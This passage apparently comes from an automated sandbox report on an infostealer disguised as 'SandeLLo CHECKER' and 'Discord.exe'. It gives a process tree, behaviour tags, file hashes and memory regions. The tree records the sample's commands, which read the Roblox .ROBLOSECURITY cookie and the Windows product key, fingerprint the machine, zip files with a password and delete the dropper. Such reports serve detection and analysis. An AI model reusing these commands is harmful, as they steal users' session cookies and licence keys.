                                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4348
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                          4⤵
                                                                            PID:2720
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              5⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:392
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                            4⤵
                                                                              PID:4976
                                                                              • C:\Windows\system32\getmac.exe
                                                                                getmac
                                                                                5⤵
                                                                                  PID:4108
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42002\rar.exe a -r -hp"z1" "C:\Users\Admin\AppData\Local\Temp\DXmlC.zip" *"
                                                                                4⤵
                                                                                  PID:1692
                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI42002\rar.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI42002\rar.exe a -r -hp"z1" "C:\Users\Admin\AppData\Local\Temp\DXmlC.zip" *
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3548
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                  4⤵
                                                                                    PID:1784
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic os get Caption
                                                                                      5⤵
                                                                                        PID:4468
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                      4⤵
                                                                                        PID:3644
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic computersystem get totalphysicalmemory
                                                                                          5⤵
                                                                                            PID:2428
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                          4⤵
                                                                                            PID:412
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic csproduct get uuid
                                                                                              5⤵
                                                                                                PID:1520
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                              4⤵
                                                                                                PID:4764
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1332
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                4⤵
                                                                                                  PID:1708
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic path win32_VideoController get name
                                                                                                    5⤵
                                                                                                    • Detects videocard installed
                                                                                                    PID:3172
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                  4⤵
                                                                                                    PID:4512
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                        PID:4712
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                        5⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2260
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                                                                      4⤵
                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                      PID:2804
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping localhost -n 3
                                                                                                        5⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:4468
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Discord.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
                                                                                                  2⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2260
                                                                                                  • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4012
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3984
                                                                                              • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3444
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                1⤵
                                                                                                • Enumerates connected drives
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1356
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 5FA8CDC64293E25724FA4989A163F692 C
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2484
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 788C92626C6ED0B467353635278A72CA C
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3356
                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                1⤵
                                                                                                  PID:3832
                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe ef956b1691a3fd1f96991a7fca317cbb 3HbDfE9Xt0eQvwOYgCiyOw.0.1.0.0.0
                                                                                                  1⤵
                                                                                                    PID:3160
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                    1⤵
                                                                                                      PID:3520
                                                                                                    • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3760
                                                                                                    • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4532

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Discord.exe.log

                                                                                                      Filesize

                                                                                                      1KB

                                                                                                      MD5

                                                                                                      0672db2ef13237d5cb85075ff4915942

                                                                                                      SHA1

                                                                                                      ad8b4d3eb5e40791c47d48b22e273486f25f663f

                                                                                                      SHA256

                                                                                                      0a933408890369b5a178f9c30aa93d2c94f425650815cf8e8310de4e90a3b519

                                                                                                      SHA512

                                                                                                      84ad10ba5b695567d33a52f786405a5544aa49d8d23631ba9edf3afa877c5dbd81570d15bcf74bce5d9fb1afad2117d0a4ef913b396c0d923afefe615619c84b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Built.exe

                                                                                                      Filesize

                                                                                                      7.4MB

                                                                                                      MD5

                                                                                                      a4e90f8b6a74e5500c2635fe1b4c9f2c

                                                                                                      SHA1

                                                                                                      3d21ce3e3134bbb573fb4793cffd1d39cbc89304

                                                                                                      SHA256

                                                                                                      d4334aea8571ab83ae93969fa9b5a9a522aff3368511884378d0c5acf7c7ae52

                                                                                                      SHA512

                                                                                                      7464f3138ba3a958f841b0a223afa41ab78c4798f14cecac2a1e408b955fb374dc0badfc91d08235812d9047ab9870881449fbd40f005e18037f8c51bf066c7f

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Discord.exe

                                                                                                      Filesize

                                                                                                      3.2MB

                                                                                                      MD5

                                                                                                      90cd2e9c676fc284584653b5d4f95126

                                                                                                      SHA1

                                                                                                      4e1a138d45e7833d1eb4205606cdd7f4508bce5c

                                                                                                      SHA256

                                                                                                      5ccf3a06eeaa035c5b4b60f44e7820692c015208d62e415a3c224c009edde3df

                                                                                                      SHA512

                                                                                                      57166446c7743344914d2c1e089e066bc0ddddc29cb8e64e801f01c63f6287d524a3778a7d67070779e90ad31e7b0675f081dafbd32b34aa407e20706885a146

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI8D1E.tmp

                                                                                                      Filesize

                                                                                                      587KB

                                                                                                      MD5

                                                                                                      9e0aef52f6c03b2fea067342d9d4f22f

                                                                                                      SHA1

                                                                                                      d4431a858c8a7a79315829ec7aa82e838c2714f4

                                                                                                      SHA256

                                                                                                      42b8adafcb4e8496d9822a0c504f449e56456528a9251c153381d3f63d197e5b

                                                                                                      SHA512

                                                                                                      42858a6695d7906b3df4dc97f3b1fac737633a51ffb52e8ec8eddeb21f8cdb53c199bb698e54c4a931155eafd879de6fff114b84f298c84436b776e286ebeeb1

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI8DBC.tmp

                                                                                                      Filesize

                                                                                                      1.1MB

                                                                                                      MD5

                                                                                                      c04ed00ddcb3518e8cf6db24db294a50

                                                                                                      SHA1

                                                                                                      cc98cc3ab9c4371f85ea227d9f761bab4aa76baa

                                                                                                      SHA256

                                                                                                      3c21e1f3bb3ebeb5f0ff68658db8abd18b62f8b195288c4bf87936fc51f8ae9e

                                                                                                      SHA512

                                                                                                      736946a3130f294878ea51145960017babcc1b8ac2c96afd8b9e2a4d120f173afb84bbd04b6f0113f286d4bc671befecd4e92c582f1de1a0d5bc8738c3cae9c5

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI935B.tmp

                                                                                                      Filesize

                                                                                                      709KB

                                                                                                      MD5

                                                                                                      eb7811666ac7be6477e23af68511424f

                                                                                                      SHA1

                                                                                                      1623579c5a3710dcc694a2fd49defa27d56d9175

                                                                                                      SHA256

                                                                                                      ad706739b04256b9215e80d2d030863a37f0d7fd0e4071d0a3a73d6704d8bd8f

                                                                                                      SHA512

                                                                                                      3055baa15c92f476513c66a423043dc4b8c5f83f47643ad77665d6a2f823f4655bf4ae241d8af4bc34d53630df1c35989f0b11b934a631960668fcc7a8c81a7b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SandeLLo CHECKER.exe

                                                                                                      Filesize

                                                                                                      5.7MB

                                                                                                      MD5

                                                                                                      8a0591a6b534e32fa179f2d781b79026

                                                                                                      SHA1

                                                                                                      61e1aff6f862cbce0e1f6e9e70d186e5013d9846

                                                                                                      SHA256

                                                                                                      4df8350850592b587c4d2aaabddc8454bc4652df0082b85c3336139a9c6ea53e

                                                                                                      SHA512

                                                                                                      0a261afd07a152e0f4e7d4df8ad0d57c53e9690b0b4f7ed13614b60c55466bafa7ac70472f6b1b5b41e49b249f080ad3c4d440b655b631b17c3c7e1cea3055bd

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\VCRUNTIME140.dll

                                                                                                      Filesize

                                                                                                      106KB

                                                                                                      MD5

                                                                                                      49c96cecda5c6c660a107d378fdfc3d4

                                                                                                      SHA1

                                                                                                      00149b7a66723e3f0310f139489fe172f818ca8e

                                                                                                      SHA256

                                                                                                      69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

                                                                                                      SHA512

                                                                                                      e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_bz2.pyd

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                      MD5

                                                                                                      c413931b63def8c71374d7826fbf3ab4

                                                                                                      SHA1

                                                                                                      8b93087be080734db3399dc415cc5c875de857e2

                                                                                                      SHA256

                                                                                                      17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

                                                                                                      SHA512

                                                                                                      7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_ctypes.pyd

                                                                                                      Filesize

                                                                                                      58KB

                                                                                                      MD5

                                                                                                      00f75daaa7f8a897f2a330e00fad78ac

                                                                                                      SHA1

                                                                                                      44aec43e5f8f1282989b14c4e3bd238c45d6e334

                                                                                                      SHA256

                                                                                                      9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

                                                                                                      SHA512

                                                                                                      f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_decimal.pyd

                                                                                                      Filesize

                                                                                                      106KB

                                                                                                      MD5

                                                                                                      e3fb8bf23d857b1eb860923ccc47baa5

                                                                                                      SHA1

                                                                                                      46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

                                                                                                      SHA256

                                                                                                      7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

                                                                                                      SHA512

                                                                                                      7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_hashlib.pyd

                                                                                                      Filesize

                                                                                                      35KB

                                                                                                      MD5

                                                                                                      b227bf5d9fec25e2b36d416ccd943ca3

                                                                                                      SHA1

                                                                                                      4fae06f24a1b61e6594747ec934cbf06e7ec3773

                                                                                                      SHA256

                                                                                                      d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

                                                                                                      SHA512

                                                                                                      c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_lzma.pyd

                                                                                                      Filesize

                                                                                                      85KB

                                                                                                      MD5

                                                                                                      542eab18252d569c8abef7c58d303547

                                                                                                      SHA1

                                                                                                      05eff580466553f4687ae43acba8db3757c08151

                                                                                                      SHA256

                                                                                                      d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

                                                                                                      SHA512

                                                                                                      b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_queue.pyd

                                                                                                      Filesize

                                                                                                      25KB

                                                                                                      MD5

                                                                                                      347d6a8c2d48003301032546c140c145

                                                                                                      SHA1

                                                                                                      1a3eb60ad4f3da882a3fd1e4248662f21bd34193

                                                                                                      SHA256

                                                                                                      e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

                                                                                                      SHA512

                                                                                                      b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_socket.pyd

                                                                                                      Filesize

                                                                                                      43KB

                                                                                                      MD5

                                                                                                      1a34253aa7c77f9534561dc66ac5cf49

                                                                                                      SHA1

                                                                                                      fcd5e952f8038a16da6c3092183188d997e32fb9

                                                                                                      SHA256

                                                                                                      dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

                                                                                                      SHA512

                                                                                                      ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_sqlite3.pyd

                                                                                                      Filesize

                                                                                                      56KB

                                                                                                      MD5

                                                                                                      1a8fdc36f7138edcc84ee506c5ec9b92

                                                                                                      SHA1

                                                                                                      e5e2da357fe50a0927300e05c26a75267429db28

                                                                                                      SHA256

                                                                                                      8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

                                                                                                      SHA512

                                                                                                      462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\_ssl.pyd

                                                                                                      Filesize

                                                                                                      65KB

                                                                                                      MD5

                                                                                                      f9cc7385b4617df1ddf030f594f37323

                                                                                                      SHA1

                                                                                                      ebceec12e43bee669f586919a928a1fd93e23a97

                                                                                                      SHA256

                                                                                                      b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

                                                                                                      SHA512

                                                                                                      3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\base_library.zip

                                                                                                      Filesize

                                                                                                      1.4MB

                                                                                                      MD5

                                                                                                      32ede00817b1d74ce945dcd1e8505ad0

                                                                                                      SHA1

                                                                                                      51b5390db339feeed89bffca925896aff49c63fb

                                                                                                      SHA256

                                                                                                      4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

                                                                                                      SHA512

                                                                                                      a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\blank.aes

                                                                                                      Filesize

                                                                                                      120KB

                                                                                                      MD5

                                                                                                      9d170e0892e4fd63830f27ea3a99ec14

                                                                                                      SHA1

                                                                                                      c4bab86888d25aa301cd96dff12fedc923133130

                                                                                                      SHA256

                                                                                                      5efeeaeed602b5aa9312bf03f374bb9d5536e343e51b4fcba66193cc9f14604a

                                                                                                      SHA512

                                                                                                      6267ecfdd28679e9566ad4fa0b3bcea3943c4ee82e991941cc995cca20cd6e13a89bff309396b9d5ceb87e24eb678dbb77ceb1117040b3ad64dc7a3558695feb

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\libcrypto-3.dll

                                                                                                      Filesize

                                                                                                      1.6MB

                                                                                                      MD5

                                                                                                      78ebd9cb6709d939e4e0f2a6bbb80da9

                                                                                                      SHA1

                                                                                                      ea5d7307e781bc1fa0a2d098472e6ea639d87b73

                                                                                                      SHA256

                                                                                                      6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

                                                                                                      SHA512

                                                                                                      b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\libffi-8.dll

                                                                                                      Filesize

                                                                                                      29KB

                                                                                                      MD5

                                                                                                      08b000c3d990bc018fcb91a1e175e06e

                                                                                                      SHA1

                                                                                                      bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                                      SHA256

                                                                                                      135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                                      SHA512

                                                                                                      8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\libssl-3.dll

                                                                                                      Filesize

                                                                                                      223KB

                                                                                                      MD5

                                                                                                      bf4a722ae2eae985bacc9d2117d90a6f

                                                                                                      SHA1

                                                                                                      3e29de32176d695d49c6b227ffd19b54abb521ef

                                                                                                      SHA256

                                                                                                      827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

                                                                                                      SHA512

                                                                                                      dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\python311.dll

                                                                                                      Filesize

                                                                                                      1.6MB

                                                                                                      MD5

                                                                                                      5f6fd64ec2d7d73ae49c34dd12cedb23

                                                                                                      SHA1

                                                                                                      c6e0385a868f3153a6e8879527749db52dce4125

                                                                                                      SHA256

                                                                                                      ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

                                                                                                      SHA512

                                                                                                      c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\rar.exe

                                                                                                      Filesize

                                                                                                      615KB

                                                                                                      MD5

                                                                                                      9c223575ae5b9544bc3d69ac6364f75e

                                                                                                      SHA1

                                                                                                      8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                                      SHA256

                                                                                                      90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                                      SHA512

                                                                                                      57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\rarreg.key

                                                                                                      Filesize

                                                                                                      456B

                                                                                                      MD5

                                                                                                      4531984cad7dacf24c086830068c4abe

                                                                                                      SHA1

                                                                                                      fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                                      SHA256

                                                                                                      58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                                      SHA512

                                                                                                      00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\select.pyd

                                                                                                      Filesize

                                                                                                      25KB

                                                                                                      MD5

                                                                                                      45d5a749e3cd3c2de26a855b582373f6

                                                                                                      SHA1

                                                                                                      90bb8ac4495f239c07ec2090b935628a320b31fc

                                                                                                      SHA256

                                                                                                      2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

                                                                                                      SHA512

                                                                                                      c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\sqlite3.dll

                                                                                                      Filesize

                                                                                                      622KB

                                                                                                      MD5

                                                                                                      dbc64142944210671cca9d449dab62e6

                                                                                                      SHA1

                                                                                                      a2a2098b04b1205ba221244be43b88d90688334c

                                                                                                      SHA256

                                                                                                      6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

                                                                                                      SHA512

                                                                                                      3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\unicodedata.pyd

                                                                                                      Filesize

                                                                                                      295KB

                                                                                                      MD5

                                                                                                      8c42fcc013a1820f82667188e77be22d

                                                                                                      SHA1

                                                                                                      fba7e4e0f86619aaf2868cedd72149e56a5a87d4

                                                                                                      SHA256

                                                                                                      0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

                                                                                                      SHA512

                                                                                                      3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oaj33uqi.fxc.ps1

                                                                                                      Filesize

                                                                                                      60B

                                                                                                      MD5

                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                      SHA1

                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                      SHA256

                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                      SHA512

                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi

                                                                                                      Filesize

                                                                                                      3.9MB

                                                                                                      MD5

                                                                                                      e47c6582751cdc22d8c0eeac60de6d0b

                                                                                                      SHA1

                                                                                                      4c057d98754b09c95fcae46162673d1b241ccea4

                                                                                                      SHA256

                                                                                                      c645a247c399ae2e8ccf8f826415e7287b52080fcae3dac203e7e543fe792ccb

                                                                                                      SHA512

                                                                                                      2e2dc24e4cc1314f17506c0007f1e5c1200af1a2b14820968e7a1019c29b60913701beb5498a6c13e7cef938e98efa464b1cae2f5a8cc59c493caebfd158da5b

                                                                                                    • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe.config

                                                                                                      Filesize

                                                                                                      357B

                                                                                                      MD5

                                                                                                      a2b76cea3a59fa9af5ea21ff68139c98

                                                                                                      SHA1

                                                                                                      35d76475e6a54c168f536e30206578babff58274

                                                                                                      SHA256

                                                                                                      f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

                                                                                                      SHA512

                                                                                                      b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

                                                                                                    • memory/828-226-0x000001D325F80000-0x000001D325FA2000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/1312-402-0x00007FFD3F6A0000-0x00007FFD3F7BC000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.1MB

                                                                                                    • memory/1312-85-0x00007FFD50490000-0x00007FFD5049F000-memory.dmp

                                                                                                      Filesize

                                                                                                      60KB

                                                                                                    • memory/1312-469-0x00007FFD50070000-0x00007FFD50084000-memory.dmp

                                                                                                      Filesize

                                                                                                      80KB

                                                                                                    • memory/1312-470-0x00007FFD502E0000-0x00007FFD502ED000-memory.dmp

                                                                                                      Filesize

                                                                                                      52KB

                                                                                                    • memory/1312-471-0x00007FFD3F6A0000-0x00007FFD3F7BC000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.1MB

                                                                                                    • memory/1312-472-0x00007FFD3F7C0000-0x00007FFD3FCE0000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.1MB

                                                                                                    • memory/1312-457-0x00007FFD40300000-0x00007FFD408E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

